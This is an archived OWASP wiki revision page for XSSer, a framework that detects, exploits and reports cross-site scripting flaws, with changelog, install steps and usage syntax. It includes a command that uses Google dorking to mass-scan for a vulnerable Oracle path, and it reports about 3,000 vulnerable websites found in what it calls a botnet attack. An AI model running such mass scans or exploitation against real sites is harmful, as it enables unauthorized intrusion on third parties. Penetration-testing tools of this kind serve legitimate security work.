This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit

Difference between revisions of "OWASP XSSER"

Jump to: navigation, search
Line 30: Line 30:
  | style="width:29%; background:#cccccc" align="center"| Paper: 'XSS for fun and profit':<br>[ '''English'''] - [ '''Spanish''']
  | style="width:29%; background:#cccccc" align="center"| Paper: 'XSS for fun and profit':<br>[ '''English'''] - [ '''Spanish''']
=GSoC 2013 Proposal=
[ '''OWASP XSSer Project Ideas''']
Students presentations, questions and more: [ '''Mailing list archive: GSoC13 thread''']
Proposals 'on stage':
=Current Version=
=Current Version=

Revision as of 11:35, 29 April 2013

OWASP XSSer Project
Web application vulnerability scanner / Security auditor
Project Name XSSer: The Cross Site Scripting Framework
Short Project Description

Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications. It contains several options to try to bypass certain filters, and various special techniques of code injection.

Key Project Information Project Leader
Next Version
Mailing List
Subscribe - Use
Project Type
Pentesting tool
NLNet Awards
OWASP tool
Release Status Main Links Related Documentation
v1.6b - "Grey Swarm" SF Website
Code Releases
Paper: 'XSS for fun and profit':
English - Spanish

GSoC 2013 Proposal

OWASP XSSer Project Ideas

Students presentations, questions and more: Mailing list archive: GSoC13 thread

Proposals 'on stage':

Current Version

XSSer v1.6b ("The Mosquito: Grey Swarm!")

Xsser-greyswarm sm.png
[+ Click for Zoom]

This version include more features on the GTK+ interface:

Xsser-greyswarm-donate sm.png
[+ Click for Zoom]

Xsser-greyswarm-map sm.png
[+ Click for Zoom]

Xsser-greyswarm-check sm.png
[+ Click for Zoom]

Xsser-greyswarm-conn sm.png
[+ Click for Zoom]

TIP: type: 'xsser --gtk' to start from shell. Or run directly XSSer from menu Xssericon 32x32.png


XSSer runs on many platforms. It requires Python and the following libraries:

- python-pycurl - Python bindings to libcurl
- python-beautifulsoup - error-tolerant HTML parser for Python
- python-libxml2 - Python bindings for the GNOME XML library
- python-geoip - Python bindings for the GeoIP IP-to-country resolver library

On Debian-based systems (ex: Ubuntu), run:

sudo apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip

How to Use

xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]



November, 28, 2011:

Core: Added Drop Cookie option + Added Random IP X-Forwarded-For option + Random X-Client-IP option + Added GSS and NTLM authentication methods + Added Ignore proxy option + Added TCP-NODELAY option + Added Follow redirects option + Added Follow redirects limiter parameter + Added Auto-HEAD precheck system + Added No-HEAD option + Added Isalive option + Added Check at url option (Blind XSS) + Added Reverse Check parameter + Added PHPIDS (v.0.6.5) exploit + Added More vectors to auto-payloading + Added HTML5 studied vectors + Fixed Different bugs on core + Fixed Curl handlerer options + Fixed Dorkerers system + Fixed Bugs on results propagation + Fixed POST requests.

GTK: Added New features to GTK controller + Added Detailed views to GTK interface.

February, 25, 2011:

Added package for Archlinux.

February, 24, 2011:

Core: Added GTK option + Heuristic test + HTTP Response Splitting (ak.a Induced attack!) + DoS (Server) injection + Final code (added DCP & DOM injections) + Update option + Code clean + Bugfixing + New options menu + More advanced statistics system + Updated dorkerers list.

GTK: Intuitive navigation + Wizard helper ("build your pentesting answering some questions") + Expert visor (with target(s) geolocation included + Documentation.

November, 13, 2010:

XSSer package for Archlinux can be found in the AUR.

November, 11, 2010:

Created XSSer package (v1.0) for Ubuntu/Debian based systems.

November, 9, 2010:

Added more advanced statistics results + Bugfixig.

November, 7, 2010:

Added "final remote injections" option + Cross Flash Attack! + Cross Frame Scripting + Data Control Protocol Injections + Base64 (rfc2397) PoC + OnMouseMove PoC + Browser launcher + Code clean + Bugfixing + New options menu + Pre-check system + Crawler spidering clones + More advanced statistics system + "Mana" output results.

October, 8, 2010:

POC: Detecting, exploiting and reporting "fcgi-bin/echo" Oracle vulnerability with XSSer

./XSSer -d "'inurl:fcgi-bin/echo'" --De "google" --proxy "" -s --tweet

Results of the -botnet- attack in real time:


Reported: apróx. 3.000 websites vulnerables (XSSer storm!!).

September 22, 2010:

Added a-xml exporter + ImageXSS + New dorker engines (total 10) + Core clean + Bugfixing + Social Networking XSS auto-publisher + Started -federated- XSS (full disclosure) pentesting botnet.

August 20, 2010:

Added attack payloads to auto-payloader (26 new injections) + POST + Statistics + URL Shorteners + IP Octal + Post-processing payloading + DOM Shadows! + Cookie injector + Browser DoS (Denegation of Service).

July 1, 2010:

Dorking + Crawling + IP DWORD + Core clean.

April 19, 2010:

HTTPS implemented + patched bugs.

March 22, 2010:

Added "inject your own payload" option. Can be used with all character encoding -bypassers- of XSSer.

March 18, 2010:

Added attack payloads to auto-payloader (62 different XSS injections).

March 16, 2010:

Added new payload encoders to bypass filters.


Download roadmap planning: Next Version



   * - channel: #xsser

Mailing lists:

   * Owasp: Subscribe Write
   * Sourceforge: Subscribe Write

Project Leader:

 GPG ID: 0xB8AC3776
   * Website:
   * Email:
         o psy
         o epsylon
   * Microblogging: